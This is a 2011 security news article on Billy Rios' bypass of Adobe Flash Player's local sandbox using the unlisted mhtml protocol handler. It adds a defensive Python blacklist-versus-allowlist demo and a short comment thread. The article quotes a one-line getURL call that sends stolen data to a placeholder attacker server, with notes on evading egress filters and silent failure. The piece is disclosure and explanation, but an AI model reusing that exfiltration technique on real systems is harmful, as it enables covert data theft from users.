Adobe's Flash Sandbox Not So Secure After All

Martin Brinkmann
Jan 15, 2011
Updated • Dec 3, 2012
Security

The idea on paper sounded great: add a sandbox to Adobe Flash to prevent many attacks from affecting the underlying operating system. It appears, however, that the sandbox, introduced in December 2010, is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe's Flash Player sandbox locally.

He found out that SWFs loaded from a local file can in fact bypass the sandbox by passing "the contents to the attacker server via getURL() and a url like: file://..". That technique, however, can only be used to pass IP addresses and hostnames, not any other data.

Data can, however, be sent to a remote server on the Internet as well. A solution was quickly discovered: Adobe is blacklisting protocol handlers, which means that Flash Player blocks some protocols (like JavaScript://) while allowing others (like mailto://). While it is theoretically possible to bypass the blacklist itself, an even easier solution is to find a protocol handler that is currently not included in the list.

Billy Rios found the mhtml protocol:

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL('mhtml:http://attacker-server.com/stolen-data-here', '');

Some other benefits for using the mhtml protocol handler are:

The request goes over http/https and port 80/443 so it will get past most egress filtering
If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
The protocol handler is available by default on Win7 and will launch with no protocol handler warning
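To make the blacklist-versus-allowlist point concrete, here is a small Python model of a URL-scheme filter. It was written for this article and is not Adobe's code or part of Rios' write-up; the blacklist contents and the example.invalid URLs are constructed samples, not Flash Player's actual list. The weak filter passes anything not on its list, so an unlisted handler such as mhtml: goes straight through, whereas the allowlist variant admits only the schemes the application actually needs and rejects everything else, including case and whitespace variants of a listed scheme.

```python
"""Added example: why a scheme blacklist fails where an allowlist holds.

The article describes Flash Player blocking a fixed list of URL schemes
(e.g. javascript:) from getURL() while letting everything else through,
so an unlisted but equally capable handler such as mhtml: slipped past.
This toy filter is written for the article; it is not Adobe's code, and
the blacklist below is a constructed sample, not Flash's actual list.
"""
from urllib.parse import urlsplit

# Constructed sample blacklist in the spirit of the article: a few
# dangerous schemes, with mhtml deliberately absent, as it was for Flash.
SAMPLE_BLACKLIST = frozenset({"javascript", "vbscript", "file", "res"})

# What a hardened filter does instead: name the handful of schemes the
# application actually needs and refuse everything else.
ALLOWLIST = frozenset({"http", "https", "mailto"})


def scheme_of(url: str) -> str:
    """Return the normalised scheme of *url*.

    Leading whitespace is stripped and the scheme lowercased, because
    handler dispatch is case-insensitive and a filter comparing raw
    strings would treat "JavaScript:" as an unknown, unlisted scheme.
    For "mhtml:http://..." urlsplit reports the outer scheme, "mhtml",
    which is exactly the handler the operating system would invoke.
    """
    return urlsplit(url.strip()).scheme.lower()


def blacklist_allows(url: str) -> bool:
    """The weak design: permit unless the scheme is on a known-bad list."""
    return scheme_of(url) not in SAMPLE_BLACKLIST


def allowlist_allows(url: str) -> bool:
    """The hardened design: permit only schemes explicitly approved."""
    return scheme_of(url) in ALLOWLIST


def compare(urls):
    """Return {url: (blacklist_verdict, allowlist_verdict)} for review."""
    return {u: (blacklist_allows(u), allowlist_allows(u)) for u in urls}


if __name__ == "__main__":
    # Constructed sample inputs; hostnames are placeholders.
    samples = [
        "http://example.invalid/page",
        "mailto:someone@example.invalid",
        "javascript:alert(1)",
        "  JavaScript:alert(1)",
        "mhtml:http://example.invalid/collect",
        "file:///C:/example.txt",
    ]
    for url, (weak, strong) in compare(samples).items():
        print(f"{url!r:45} blacklist={'pass' if weak else 'BLOCK'}  "
              f"allowlist={'pass' if strong else 'BLOCK'}")
```

Running the script shows the two designs agreeing on the obvious cases and disagreeing on exactly the one the article is about: the mhtml URL passes the blacklist and is rejected by the allowlist. Any filter that dispatches to OS-level handlers should take the allowlist shape, since the set of installed handlers is neither known in advance nor under the application's control.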

Attackers need to create a Flash file containing the mhtml request, and users would then need to open that file locally on their computer system. How does it get there? For instance by email or as part of a virus attack.


Comments

  1. Nicolai said on January 18, 2011 at 11:02 pm

    So far, there haven’t been any “real” exploits. This attack needs *a lot* of social engineering (SE) to work.

    “How does it get there? For instance by email or as part of a virus attack.” – Well, by default lots of computers don’t open flash files probably (ie with IE), so the user needs to drag’n’drop the file into IE to get his/her information stolen. And why should a virus use a flash file to steal info? It can just send the data itself (=easier and more “safe”).

  2. BobbyPhoenix said on January 15, 2011 at 11:55 pm

    Does this apply to the sandboxing in Chrome, or just Flash in general on all browsers?

    1. Martin said on January 16, 2011 at 3:05 am

      This applies to the general Flash installation.
